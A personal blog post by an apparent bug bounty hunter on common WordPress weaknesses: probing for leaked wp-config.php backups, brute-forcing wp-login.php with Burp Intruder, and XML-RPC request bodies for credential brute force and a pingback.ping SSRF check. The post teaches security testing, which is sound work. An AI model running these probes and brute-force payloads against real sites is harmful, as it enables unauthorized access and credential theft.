Common Vulnerabilities in Wordpress Sites
Hello guys myself Sriharan Mahendran an individual Penetration Tester and a Security Researcher. Throughout my career, I’ve successfully secured numerous company websites against cyber threats. Today marks the first blog of my cybersecurity journey , where I aim to share insights and experiences with you
I will try to mention some of the common wordpress misconfiguration and vulnerabilities that i know in this blog
! Let’s begin hacking Wordpress !
→ What Is WordPress?
WordPress is a free and open-source content management system that lets anyone create and manage websites easily. Starting as a blogging platform, the WordPress software has evolved to help users build various sites, from blogs and portfolios to eCommerce stores.
→ Why Use WordPress?
With so many website builders on the market, you may wonder what makes WordPress different. Here’s why millions of site owners use WordPress:
Easy to Use
With WordPress, users can create their own website without code. The admin panel is intuitive, letting you easily manage content, media, appearance, and plugins.
→ How Does WordPress Work?
WordPress runs on a database system that enables users to add, modify, and organize files, themes, plugins, and other types of content.
→ Detecting wordpress :
Using Wappalyzer Extension For Chrome For Firefox
Wappalyzers used for :
Identify technologies on websites
Find out the technology stack of any website. Create lists of websites that use certain technologies, with company and contact details. Use our tools for lead generation, market analysis and competitor research.
After detecting the WordPress CMS , We can use Manual analysis and automated tools based vulnerability testing
Vulnerability 1 : Severity High [ Configuration File Leakage ] :
Accessing sensitive files like wp-config.php on a production server is indeed a critical security issue. It can expose crucial information such as database credentials, which could be exploited by attackers to compromise the website or steal data.
Attempting to access the wp-config.php file using different extensions is a common technique for attackers looking to find vulnerabilities. While accessing sensitive files like this is generally forbidden, it’s still a common oversight that developers make.
For example :
/wp-config.md
/wp-config.zip
/wp-config.txt
/wp-config.php.bak
/wp-config.php_orig
/wp-config.bak
and Automated scan can be done using WP-scan and other automation tools
next next
Vulnerability 2 : Severity medium : Admin Username enumeration via REST API
The WordPress REST API poses a security risk by disclosing user data associated with authors of public posts. Initially classified as a P4 vulnerability according to Bugcrowd’s Vulnerability Rating Taxonomy (VRT) under Enumeration -> Usernames -> Non-Bruteforce,
this threat level can be increased to P1 or P2 when coupled with next Following steps
- Open your target WordPress site in your BurpSuite-configured browser.
- Apppend /wp-login.php to the target website’s URL. This will take you to the WordPress login page.
- Enter any random credentials (e.g., admin:admin) and capture that request using BurpSuite’s proxy feature. Ensure that you intercept the request before it is sent to the server.
- Once you’ve captured the request, send it to Intruder by right-clicking on the request and selecting “Send to Intruder.”
- In the Intruder tab, navigate to the “Positions” sub-tab. Here, select the parameter you want to brute-force. In this case, it’s the log parameter for the username.
- Clear all positions and add the value of pwd parameter as §admin§. This indicates that we will replace the password with our payload during the brute-force attack.
- Switch to the “Payloads” tab. Here, you can input your wordlist containing potential passwords.
- Once your wordlist is loaded, click on the “Start attack” button to begin the brute-force attack. BurpSuite will iterate through the wordlist, sending login requests with different passwords for the specified username.
- Monitor the attack progress in the Intruder tab. Once the correct password is found, BurpSuite will capture the response, indicating a successful login attempt.
Vulnerability 3 : Severity low — high : Xmlrpc.php
XML-RPC, or XML Remote Procedure Call, is an API (application program interface) used on WordPress websites. It enables developers to interact with a WordPress site programmatically, allowing them to create mobile apps, desktop apps, and other services that communicate with the site.
The XML-RPC API provided by WordPress offers developers the ability to perform various tasks that would otherwise require manual interaction through the web interface.
These tasks include:
Publishing a post
Editing a post
Deleting a post
Uploading a new file (such as an image for a post)
Retrieving a list of comments
Editing comments
BruteForce attack
- This is what you originally see when you try to open the xmlrpc.php located at
http://<targetWebSite.com>/<wordpress directory>/xmlrpc.php - Open your proxy (I am using burp )and resend the request by changing the GET request to POST request
- To list all available methods using XML-RPC on a WordPress site, you need to send a POST request with specific POST data. Here’s an example of how you can do this:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Before proceeding with the attack, we need to verify the availability of the following methods:
wp.getUserBlogs
wp.getCategories
metaWeblog.getUsersBlogs
there are a few more methods but these are most commonly available & I have dealt with these
4. If any of these methods are available, we can proceed with the brute-force login attack using the following POST request structure:
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
We can also attack high severe vulnnerability like SSRF using this xmlrpc.php
- List all the methods and search for the following ‘pingback.ping’
- If you discover the availability of the pingback.ping method, we can proceed to trigger a pingback to our server using BurpSuite Collaborator. Here’s how you can do it:
- Start BurpSuite and configure Burp Collaborator. Go to “Burp” > “Burp Collaborator Client” and ensure that the Collaborator client is running.
- In BurpSuite, intercept the POST request to the XML-RPC endpoint containing the pingback.ping method.
- Modify the request to include Burp Collaborator’s URL in the POST data:
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://YOUR_COLLABORATOR_URL/pingback:<port></string></value>
</param>
<param>
<value><string>http://SOME_VALID_BLOG_FROM_THE_SITE</string></value>
</param>
</params>
</methodCall>
Using these Vulnerabilities in wordpress i was able to Earn some bounties
Also Contact me / Follow me in
LinkedIn → https://www.linkedin.com/in/sriharan-mahendran/
G-Mail → sriharanmahimala125@gmail.com